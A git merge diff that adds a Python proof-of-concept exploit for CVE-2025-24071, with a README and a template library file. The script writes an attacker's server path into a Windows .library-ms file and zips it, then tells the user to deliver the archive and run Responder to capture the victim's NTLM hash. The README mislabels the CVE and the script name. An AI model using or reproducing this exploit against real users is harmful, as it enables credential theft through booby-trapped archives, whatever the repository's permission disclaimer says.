Merge pull request #3 from 0xVoodoo/CVE-2025-24071

Adding CVE-2025-24071 and tweaking READMEs
2025-08-19 12:39:47 -06:00
parent 81b198f31c 78bdacd90d
commit 1f65c00ac5
5 changed files with 105 additions and 0 deletions
@@ -24,4 +24,6 @@ This is basically just a parser for the JSON returned by the open API endpoints,
 # License
 GPL v3.0 - as all good software should be

+Only with explicit permission from the target system owner.
+
 Remember - don't be a skid :)
@@ -0,0 +1,71 @@
+from os import rename
+from os.path import isfile
+from zipfile import ZipFile
+import xml.etree.ElementTree as elementTree
+import argparse
+
+#pretty colors :)
+RESET = "\033[0m"
+RED   = "\033[31m"
+GREEN = "\033[32m"
+YELLOW = "\033[33m"
+BOLD  = "\033[1m"
+
+def findLib(library):
+    if not library.endswith(".library-ms"):
+            library = library + ".library-ms"
+    
+    if isfile(library):
+        pass
+    else:
+        try:
+            rename("mal.library-ms", library)
+        except (OSError, PermissionError, IsADirectoryError) as error:
+            print(f"{BOLD}{RED}[-]{RESET} Error renaming library!")
+            raise SystemExit(error)
+
+    return library
+
+
+def malLib(library, server):
+    contents = elementTree.parse(library)
+    root = contents.getroot()
+    
+    nameSpace = root.tag.split("}")[0].strip("{")
+    elementTree.register_namespace('', nameSpace)
+
+    for element in root.iter():
+        if element.tag.endswith("url"):
+            element.text = "\\\\" + server + "\\shared"
+    contents.write(library, encoding="utf-8", xml_declaration=True)
+
+def mkZip(library, filename):
+    if not filename.endswith(".zip"):
+        filename = filename + ".zip"
+
+    with ZipFile(filename, "w") as malZip:
+        malZip.write(library)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(prog='CVE-2025-24071.py',
+                                     description='This is a PoC for CVE-2025-24071, a bug in Windows Explorer that allows for NTLM hash disclosure via crafted archives.',
+                                     epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
+    parser.add_argument('-s', '--server', required=True, help='Target IP/URL')
+    parser.add_argument('-f', '--file', required=True, help='Output file name')
+    parser.add_argument('-l', '--library', help='MS Library file name (default mal.library-ms)')
+    args = parser.parse_args()
+    print("===CVE-2025-24071 PoC by 0xVoodoo===")
+    
+    if args.library:
+        library = findLib(args.library)
+    else:
+        library = "mal.library-ms"
+
+    print(f"{BOLD}{YELLOW}[*]{RESET} Modifying library")
+    malLib(library, args.server)
+
+    print(f"{BOLD}{YELLOW}[*]{RESET} Creating ZIP archive")
+    mkZip(library, args.file)
+
+    print(f"{BOLD}{GREEN}[+]{RESET} ZIP archive created:", args.file)
+    print(f"{BOLD}{YELLOW}[*]{RESET} Deliver the ZIP archive and start responder")
@@ -0,0 +1,20 @@
+# CVE-2023-24071 - Windows Explorer NTLM Hash Disclosure
+
+This exploit abuses the way Windows Explorer handles library files that have been extracted from an archive (.zip, .rar, etc.).
+When an archive containing a library is decompressed, Explorer will automatically attempt a connection to the URL specified in the library.
+
+This means that we can set up responder and listen for a connection back to our fake SMB server, disclosing the hash of the user who extracted the archive.
+
+User interaction is required as the archive file must be opened for the connection to be made.
+
+# Usage
+
+CVE-2025-2401.py -s <attacker IP/domain> -f <output file name>
+\-l <library name>  Renames the library file (default mal.library-ms)
+
+# License
+GPL v3.0 - as all good software should be
+
+Only with explicit permission from the target system owner.
+
+Remember - don't be a skid :)
@@ -0,0 +1,10 @@
+<?xml version='1.0' encoding='utf-8'?>
+<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
+  <searchConnectorDescriptionList>
+    <searchConnectorDescription>
+      <simpleLocation>
+        <url>example</url>
+      </simpleLocation>
+    </searchConnectorDescription>
+  </searchConnectorDescriptionList>
+</libraryDescription>
@@ -8,4 +8,6 @@ The vulnerable endpoint here is:
 # License
 GPL v3.0 - as all good software should be

+Only with explicit permission from the target system owner.
+
 Remember - don't be a skid :)